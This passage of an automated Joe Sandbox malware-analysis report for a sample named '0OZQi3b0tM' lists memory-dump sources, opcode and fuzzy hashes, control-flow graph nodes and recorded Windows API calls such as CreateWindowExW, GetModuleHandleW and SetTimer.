                                                                      • API String ID:
                                                                      • Opcode ID: ff50e8441651fdbf7e3b2d1d7022b6e05e399c9929bcba1934a52c835d1c9566
                                                                      • Instruction ID: 570c5e5050eea0b2409bb5918db4a11cfe8c8b08efe3a5df6f8e2969f1426087
                                                                      • Opcode Fuzzy Hash: ff50e8441651fdbf7e3b2d1d7022b6e05e399c9929bcba1934a52c835d1c9566
                                                                      • Instruction Fuzzy Hash: B0719370E016188FEB68CF6AC94479DBBF2AF88304F14D1EAD50DA7255DB345A86CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30421f6f2c3e3163041a8a982d3000785667cace0fac1337ef711c23175ff656
                                                                      • Instruction ID: 02316fd9e04d4eb69a6c9dfcd5a69baa054c27f94a9f798aa834a7140f4b69bc
                                                                      • Opcode Fuzzy Hash: 30421f6f2c3e3163041a8a982d3000785667cace0fac1337ef711c23175ff656
                                                                      • Instruction Fuzzy Hash: B1719370E006288FEB68CF6AC94479DBBF2AF88304F14D1EAD50CA6255DB345A85CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3476d76c4c687d590472c357d13c7910cf671da6fc6887ec6037b9f48e540fde
                                                                      • Instruction ID: a11ed65990760cea8a8d3c59d8c66f22991bec731f1eac8c8f144d38c64ddf6b
                                                                      • Opcode Fuzzy Hash: 3476d76c4c687d590472c357d13c7910cf671da6fc6887ec6037b9f48e540fde
                                                                      • Instruction Fuzzy Hash: 42518D70C08688CFDB16CFBAC95428DBFB3AF96314F55C2A9D464AB3A1D7350902CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 846ea334628a1098352cf1c07b54e178a23ee4304e32be5c16f562def5f5765d
                                                                      • Instruction ID: 3d5a6f6f356ea73a53d77deeb612a4949804a139aafbd66e6ab5fc5249bc5cca
                                                                      • Opcode Fuzzy Hash: 846ea334628a1098352cf1c07b54e178a23ee4304e32be5c16f562def5f5765d
                                                                      • Instruction Fuzzy Hash: DB4157B1D016188BEB58CF6BC9457C9FBF3AFC9304F14D1AAC50CA6265DB740A868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cdbecbd6f3220e4100268cc8a466d673bd1700628ec082283c90d74021da45a
                                                                      • Instruction ID: b6cdc77534b507fd087ab34430c0b4ab0e0dd3f9dea4609b031b2e296f6b05ac
                                                                      • Opcode Fuzzy Hash: 7cdbecbd6f3220e4100268cc8a466d673bd1700628ec082283c90d74021da45a
                                                                      • Instruction Fuzzy Hash: D7416A71D016188BEB58CF6BC9557C9FBF3AFC9304F04D1AAC50CA6265EB740A868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c4e4f00b8fceef3c4df06eff253c7cf94d8f7fec6c1f817e0a14a8555c8c0dfb
                                                                      • Instruction ID: 74a9dbfb987bbc09ab4891f35f0b69a455d47995bff74ec5e9a1a7d87f016b13
                                                                      • Opcode Fuzzy Hash: c4e4f00b8fceef3c4df06eff253c7cf94d8f7fec6c1f817e0a14a8555c8c0dfb
                                                                      • Instruction Fuzzy Hash: 5E414871D016188BEB58CF6BC9457DAFBF3AFC9304F14C1AAC50CA6265EB740A868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d64f0ffc222ca28fac6281598506fa0fd3b2d0ad39dd145f53cb7d5369545d50
                                                                      • Instruction ID: 89c359c09980e419ed6072e5f8abe1c753d58cfce0e284f1f60f6b242aa3f01d
                                                                      • Opcode Fuzzy Hash: d64f0ffc222ca28fac6281598506fa0fd3b2d0ad39dd145f53cb7d5369545d50
                                                                      • Instruction Fuzzy Hash: 24415BB1D016188BEB58CF6BC9557C9FBF3AFC9304F14C1AAC50CA6265DB7409868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3a87dd2377d2c547e02935137d26766b996d0c417ef41e54d8d8605a3f366a5
                                                                      • Instruction ID: db4cfae174d583bcfdfb0524300aa47a7f2ed2216b83212ca05d1a56b20e4819
                                                                      • Opcode Fuzzy Hash: d3a87dd2377d2c547e02935137d26766b996d0c417ef41e54d8d8605a3f366a5
                                                                      • Instruction Fuzzy Hash: 37415871E016188BEB58CF6BC9457CAFBF3AFC8304F14C1AAC50CA6265DB740A868F11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62d49e2b0ec4787c4d2a86f0e2d2448bdecefe5d30ee37b3f676c8e5b27f4066
                                                                      • Instruction ID: 32729f6e74adbd9e89e88ce9756e07f81347b01a60ac2b18472276e7d99e9e5f
                                                                      • Opcode Fuzzy Hash: 62d49e2b0ec4787c4d2a86f0e2d2448bdecefe5d30ee37b3f676c8e5b27f4066
                                                                      • Instruction Fuzzy Hash: F3417971D016188BEB58CF6BC9447C9FBF3AFC9304F14C1AAC50CA6265DB740A868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95aa48fb8a85a966cbe021eb7aa4ad55c3146077e1f65ea1ee9365b9c93710c9
                                                                      • Instruction ID: 2a87229421c023de2ca2fe0d23ce247b40926aa64ebad434513e4bd154ac01c5
                                                                      • Opcode Fuzzy Hash: 95aa48fb8a85a966cbe021eb7aa4ad55c3146077e1f65ea1ee9365b9c93710c9
                                                                      • Instruction Fuzzy Hash: 4C4148B1D016188BEB58CF6BD9557C9FBF3AFC8304F14C1AAC50CA6265DB740A868F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6feccb6982de8acbf9c381a732e1099ccd0ee11217b80b10ae7129297803b516
                                                                      • Instruction ID: a7a9546f64c89ad6966fe665eec4d756792b5bc7a368de969dfbedbd88893325
                                                                      • Opcode Fuzzy Hash: 6feccb6982de8acbf9c381a732e1099ccd0ee11217b80b10ae7129297803b516
                                                                      • Instruction Fuzzy Hash: 0E31FA71D056189BDB28CFABD8847DDFBF2BF89314F14C26AD418A72A4DB7509468F10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 794 4ecbfc0-4ecbfce 795 4ecbfd4-4ecbfee 794->795 796 4ecbfd0-4ecbfd3 794->796 798 4ecbff4-4ecc001 795->798 799 4ecbff0-4ecbff3 795->799 798->799 800 4ecc003-4ecc00e 798->800 801 4ecc014-4ecc021 800->801 802 4ecc010-4ecc013 800->802 801->802 803 4ecc023-4ecc02e 801->803 804 4ecc034-4ecc040 803->804 805 4ecc030-4ecc033 803->805 806 4ecc0c0-4ecc0f8 call 4ecb3fc 804->806 807 4ecc042-4ecc04e 804->807 815 4ecc0fd-4ecc0fe 806->815 808 4ecc054-4ecc06e 807->808 809 4ecc050-4ecc053 807->809 811 4ecc074-4ecc081 808->811 812 4ecc070-4ecc073 808->812 811->812 814 4ecc083-4ecc08e 811->814 816 4ecc094-4ecc0a7 814->816 817 4ecc090-4ecc093 814->817 818 4ecc0a8-4ecc0ae 816->818 819 4ecc0b4-4ecc0b9 818->819 820 4ecc0b0-4ecc0b3 818->820 819->818 821 4ecc0bb-4ecc0bf 819->821 821->806
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 364c7100b0ded1b02c659dcbceabba880b4092dac1f67619e08467f57acc8cf3
                                                                      • Instruction ID: df90eee931398fb13b9dbc27c855b427dcee5c7781b35a1e72895744c9057b90
                                                                      • Opcode Fuzzy Hash: 364c7100b0ded1b02c659dcbceabba880b4092dac1f67619e08467f57acc8cf3
                                                                      • Instruction Fuzzy Hash: 6D917FB5C04788DFDF12CFA9C981999BFB1EF49304F25819EE448AB212D335A947CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1098 c63450-c6347a 1099 c63481-c634e2 1098->1099 1100 c6347c 1098->1100 1114 c634e9 1099->1114 1100->1099 1215 c634ea call c63994 1114->1215 1216 c634ea call c63928 1114->1216 1217 c634ea call c63938 1114->1217 1115 c634f0 1218 c634f1 call c64498 1115->1218 1219 c634f1 call c64489 1115->1219 1116 c634f7 1117 c634fe-c63513 call c64859 KiUserExceptionDispatcher call c66111 1116->1117 1224 c63514 call c67196 1117->1224 1225 c63514 call c671e0 1117->1225 1120 c6351a-c635d0 call c676a8 call c67b08 call c67f68 call c683c9 1147 c635d7-c635da 1120->1147 1148 c635e1-c63620 1147->1148 1158 c63627 1148->1158 1159 c6362e-c63651 call c6e758 call c6ee29 call c6f280 call c6f6d8 call c6fb31 1158->1159 1187 c63652 call 4ec001e 1159->1187 1188 c63652 call 4ec0040 1159->1188 1165 c63658 1189 c63659 call 4ec0488 1165->1189 1190 c63659 call 4ec0498 1165->1190 1166 c6365f 1191 c63660 call 4ec08e0 1166->1191 1192 c63660 call 4ec08f0 1166->1192 1167 c63666 1193 c63667 call 4ec0d48 1167->1193 1194 c63667 call 4ec0d38 1167->1194 1168 c6366d 1195 c6366e call 4ec16f8 1168->1195 1196 c6366e call 4ec16e7 1168->1196 1169 c63674 1197 c63675 call 4ec1d48 1169->1197 1198 c63675 call 4ec1d39 1169->1198 1170 c6367b 1199 c6367c call 4ec2398 1170->1199 1200 c6367c call 4ec2389 1170->1200 1171 c63682 1201 c63683 call 4ec29cf 1171->1201 1202 c63683 call 4ec29e0 1171->1202 1172 c63689 1203 c6368a call 4ec3028 1172->1203 1204 c6368a call 4ec3018 1172->1204 1173 c63690 1205 c63691 call 4ec3668 1173->1205 1206 c63691 call 4ec3678 1173->1206 1174 c63697 1207 c63698 call 4ec3cc8 1174->1207 1208 c63698 call 4ec3cb8 1174->1208 1175 c6369e 1209 c6369f call 4ec4308 1175->1209 1210 c6369f call 4ec4318 1175->1210 1176 c636a5 1211 c636a6 call 4ec4968 1176->1211 1212 c636a6 call 4ec4958 1176->1212 1177 c636ac 1213 c636ad call 4ec4f9f 1177->1213 1214 c636ad call 4ec4fb0 1177->1214 1178 c636b3 1179 c636ba 1178->1179 1220 c636bb call 4ec5628 1179->1220 1221 c636bb call 4ec5618 1179->1221 1180 c636c1 1181 c636c8-c636f3 1180->1181 1187->1165 1188->1165 1189->1166 1190->1166 1191->1167 1192->1167 1193->1168 1194->1168 1195->1169 1196->1169 1197->1170 1198->1170 1199->1171 1200->1171 1201->1172 1202->1172 1203->1173 1204->1173 1205->1174 1206->1174 1207->1175 1208->1175 1209->1176 1210->1176 1211->1177 1212->1177 1213->1178 1214->1178 1215->1115 1216->1115 1217->1115 1218->1116 1219->1116 1220->1180 1221->1180 1224->1120 1225->1120
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 00C63506
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 4f76841e0f58f7247b6751ade59ccc566a49bc9af940d98615d56269ed5a3d47
                                                                      • Instruction ID: e8f614dc155a398d2cecc0aafecfbf5cc891edf21f84c3500d5cd83a8d387f5d
                                                                      • Opcode Fuzzy Hash: 4f76841e0f58f7247b6751ade59ccc566a49bc9af940d98615d56269ed5a3d47
                                                                      • Instruction Fuzzy Hash: 5451003542174ACFD2046F72F9ADA7E7B71FB8F31B749AC35A40AA1060CB36444ACA52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1231 c63460-c6347a 1232 c63481-c634e9 1231->1232 1233 c6347c 1231->1233 1349 c634ea call c63994 1232->1349 1350 c634ea call c63928 1232->1350 1351 c634ea call c63938 1232->1351 1233->1232 1248 c634f0 1352 c634f1 call c64498 1248->1352 1353 c634f1 call c64489 1248->1353 1249 c634f7-c63513 call c64859 KiUserExceptionDispatcher call c66111 1358 c63514 call c67196 1249->1358 1359 c63514 call c671e0 1249->1359 1253 c6351a-c63651 call c676a8 call c67b08 call c67f68 call c683c9 call c6e758 call c6ee29 call c6f280 call c6f6d8 call c6fb31 1321 c63652 call 4ec001e 1253->1321 1322 c63652 call 4ec0040 1253->1322 1298 c63658 1323 c63659 call 4ec0488 1298->1323 1324 c63659 call 4ec0498 1298->1324 1299 c6365f 1325 c63660 call 4ec08e0 1299->1325 1326 c63660 call 4ec08f0 1299->1326 1300 c63666 1327 c63667 call 4ec0d48 1300->1327 1328 c63667 call 4ec0d38 1300->1328 1301 c6366d 1329 c6366e call 4ec16f8 1301->1329 1330 c6366e call 4ec16e7 1301->1330 1302 c63674 1331 c63675 call 4ec1d48 1302->1331 1332 c63675 call 4ec1d39 1302->1332 1303 c6367b 1333 c6367c call 4ec2398 1303->1333 1334 c6367c call 4ec2389 1303->1334 1304 c63682 1335 c63683 call 4ec29cf 1304->1335 1336 c63683 call 4ec29e0 1304->1336 1305 c63689 1337 c6368a call 4ec3028 1305->1337 1338 c6368a call 4ec3018 1305->1338 1306 c63690 1339 c63691 call 4ec3668 1306->1339 1340 c63691 call 4ec3678 1306->1340 1307 c63697 1341 c63698 call 4ec3cc8 1307->1341 1342 c63698 call 4ec3cb8 1307->1342 1308 c6369e 1343 c6369f call 4ec4308 1308->1343 1344 c6369f call 4ec4318 1308->1344 1309 c636a5 1345 c636a6 call 4ec4968 1309->1345 1346 c636a6 call 4ec4958 1309->1346 1310 c636ac 1347 c636ad call 4ec4f9f 1310->1347 1348 c636ad call 4ec4fb0 1310->1348 1311 c636b3-c636ba 1354 c636bb call 4ec5628 1311->1354 1355 c636bb call 4ec5618 1311->1355 1313 c636c1 1314 c636c8-c636f3 1313->1314 1321->1298 1322->1298 1323->1299 1324->1299 1325->1300 1326->1300 1327->1301 1328->1301 1329->1302 1330->1302 1331->1303 1332->1303 1333->1304 1334->1304 1335->1305 1336->1305 1337->1306 1338->1306 1339->1307 1340->1307 1341->1308 1342->1308 1343->1309 1344->1309 1345->1310 1346->1310 1347->1311 1348->1311 1349->1248 1350->1248 1351->1248 1352->1249 1353->1249 1354->1313 1355->1313 1358->1253 1359->1253
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 00C63506
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 1e4dcfbe90d56010b1b63741382101b83b1c0c8db35d03ae6c62a095d913b64f
                                                                      • Instruction ID: fbd89e4ffa85410580805f47c6f3dc6b0a800b839332487b74d8577b6aa39ceb
                                                                      • Opcode Fuzzy Hash: 1e4dcfbe90d56010b1b63741382101b83b1c0c8db35d03ae6c62a095d913b64f
                                                                      • Instruction Fuzzy Hash: 8151F27543174ACFD2046F62F9ADA7E7B71FB8F31B749AC31A41AA1060CB36444ACB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1539 4ecb3c0-4ecb3e8 1543 4ecb38c-4ecb38e 1539->1543 1544 4ecb3ea 1539->1544 1543->1539 1545 4ecb3ec-4ecb3ee 1544->1545 1546 4ecb3f0-4ecb3ff 1544->1546 1545->1546 1548 4ecb405-4ecb41f 1546->1548 1549 4ecb401-4ecc17e 1546->1549 1558 4ecc400-4ecc407 call 4ecb44c 1548->1558 1554 4ecc189-4ecc190 1549->1554 1555 4ecc180-4ecc186 1549->1555 1556 4ecc19b-4ecc1d3 1554->1556 1557 4ecc192-4ecc198 1554->1557 1555->1554 1560 4ecc1db-4ecc23a CreateWindowExW 1556->1560 1557->1556 1562 4ecc23c-4ecc242 1560->1562 1563 4ecc243-4ecc27b 1560->1563 1562->1563 1567 4ecc27d-4ecc280 1563->1567 1568 4ecc288 1563->1568 1567->1568 1569 4ecc289 1568->1569 1569->1569
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04ECC22A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: d41b52b4b75be720a54cd7da707e43e1bb1ddbbb474328d9db59441325486e06
                                                                      • Instruction ID: d3dc2ea6160a4828bfdd07231c3b1752768f7adc364693cdfc92a5eabcb3c6dc
                                                                      • Opcode Fuzzy Hash: d41b52b4b75be720a54cd7da707e43e1bb1ddbbb474328d9db59441325486e06
                                                                      • Instruction Fuzzy Hash: 3A5168B0C043489FDB11CFA9D890ADEBFB1BF49314F24856EE418AB251E774A846CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1570 4ecb3fc-4ecc17e 1573 4ecc189-4ecc190 1570->1573 1574 4ecc180-4ecc186 1570->1574 1575 4ecc19b-4ecc23a CreateWindowExW 1573->1575 1576 4ecc192-4ecc198 1573->1576 1574->1573 1578 4ecc23c-4ecc242 1575->1578 1579 4ecc243-4ecc27b 1575->1579 1576->1575 1578->1579 1583 4ecc27d-4ecc280 1579->1583 1584 4ecc288 1579->1584 1583->1584 1585 4ecc289 1584->1585 1585->1585
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04ECC22A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 53cb60ef6b12d712000cab5cd5fdadd3ab81fc9c8be86c2ab3df37384f6b1f1e
                                                                      • Instruction ID: 71dc33e43e864944ffa698e8974e7131c227a373d7b953325e9caebb9f0c81f3
                                                                      • Opcode Fuzzy Hash: 53cb60ef6b12d712000cab5cd5fdadd3ab81fc9c8be86c2ab3df37384f6b1f1e
                                                                      • Instruction Fuzzy Hash: 6551B1B1D003099FDF14CFE9D984ADEBBB5BF48314F24962AE819AB210D774A945CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04ECDEA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: bc4c7be7e89c1da6e0fcb7a69973121b46cf7214891491b0c438b9e3e1c4eacd
                                                                      • Instruction ID: 698d83f98f5871805d631c63016a9e40a82ab8520b73b9cfe4af57fc957ca66d
                                                                      • Opcode Fuzzy Hash: bc4c7be7e89c1da6e0fcb7a69973121b46cf7214891491b0c438b9e3e1c4eacd
                                                                      • Instruction Fuzzy Hash: 9F4119B4A00205CFDB14DF99C888EAABBF5FF88314F14945DD519A7321D735A942CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04ECCB9E,?,?,?,?,?), ref: 04ECCC5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 0ca041be287962112bb151bb9c383b5d461fb7d1b1a42d71b03f4e418086b083
                                                                      • Instruction ID: 2ac2acbf713a69b205b2c725f790b6853af47477959f2cc032bb5fda0e2dc41b
                                                                      • Opcode Fuzzy Hash: 0ca041be287962112bb151bb9c383b5d461fb7d1b1a42d71b03f4e418086b083
                                                                      • Instruction Fuzzy Hash: 4621E6B59002089FDB10CFA9D584ADEBBF9FB48324F14845AE919A3310D374A955DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04ECBB26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 579d68727a745e4dbf102ebb1c20e1e3ccf829cb4609b3ea7300a0e1218958f2
                                                                      • Instruction ID: 2771c5e4d475929f45cf6413cf800941a4f0101a6a59bf0c408dde866da8dc3e
                                                                      • Opcode Fuzzy Hash: 579d68727a745e4dbf102ebb1c20e1e3ccf829cb4609b3ea7300a0e1218958f2
                                                                      • Instruction Fuzzy Hash: E911F0B5D006098FDB20CF9AD545BEEFBF4AF48224F14942AD829B7200D374A646CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04ECBB26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 2136f182231ebca049a1851f6a52779bc49841afb01a3515e910009d0f01b638
                                                                      • Instruction ID: 6c2d30cb2ad06d0ca37331ae8e3ba03585ad2676e411ad49767f9cd4567fc05b
                                                                      • Opcode Fuzzy Hash: 2136f182231ebca049a1851f6a52779bc49841afb01a3515e910009d0f01b638
                                                                      • Instruction Fuzzy Hash: E91104B5C006498FDB10CF9AD484BDEFBF5EF48324F14851AD429A7610C378A646CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetTimer.USER32(?,00EC6190,?,?), ref: 04ECE06D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: Timer
                                                                      • String ID:
                                                                      • API String ID: 2870079774-0
                                                                      • Opcode ID: 451699d598c0d173921f92943262551a8e6080a591172bc078b0bc5b13223968
                                                                      • Instruction ID: b73a8a8c2aa820aa25220cbe952e9b41406f61683b77adc9f25de623ad85deac
                                                                      • Opcode Fuzzy Hash: 451699d598c0d173921f92943262551a8e6080a591172bc078b0bc5b13223968
                                                                      • Instruction Fuzzy Hash: 721103B58002099FDB10CF99D585BDEBBF8EB58324F148419D518A7600D378AA85CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetTimer.USER32(?,00EC6190,?,?), ref: 04ECE06D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: Timer
                                                                      • String ID:
                                                                      • API String ID: 2870079774-0
                                                                      • Opcode ID: 74203dbb85cef958678b59a17eb4984d7e53f00f83a10e5a2f2674a601ec74d4
                                                                      • Instruction ID: 8c0b0a22df2370c1c968b0758bba0d9d1127e9d5382c85ae02b6fb162d6835b0
                                                                      • Opcode Fuzzy Hash: 74203dbb85cef958678b59a17eb4984d7e53f00f83a10e5a2f2674a601ec74d4
